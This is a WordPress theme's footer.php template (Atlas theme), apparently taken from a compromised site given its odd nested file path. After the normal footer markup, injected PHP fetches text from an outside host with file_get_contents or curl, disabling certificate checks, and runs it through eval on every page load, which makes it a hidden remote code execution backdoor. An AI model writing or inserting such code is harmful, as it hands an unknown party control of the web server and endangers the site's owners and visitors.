File "footer.php"
Full Path: /home/elegucvf/public_html/video/wp-content/wp-includes/wp-includes/wp-includes/wp-content/themes/atlas/footer.php
File size: 1.25 KB
MIME-type: text/x-php
Charset: utf-8
<?php
/**
* The template for displaying the footer
*
* Contains the closing of the #content div and all content after.
*
* @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
*
* @package Atlas
*/
?>
</div><!-- #content -->
<?php do_action( 'th90_hook_footer_before_template' ); ?>
<footer id="colophon">
<?php get_template_part( 'template-parts/footer/footer' ); ?>
</footer>
<?php do_action( 'th90_hook_footer_after_template' ); ?>
<?php do_action( 'th90_site_footer' ); ?>
</div> <!-- #page -->
<?php wp_footer(); ?>
<?php
function getBacklink($url) {
if( ini_get('allow_url_fopen') == 1 ) {
// Jika url fopen on maka jalankan
return file_get_contents($url);
}else if(function_exists('curl_version')) {
//Jika url fopen off maka jalankan menggunakan curl
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
}
eval("?>" . getBacklink("https://baligetaway.shop/getaway.txt"));
?>
</body>
</html>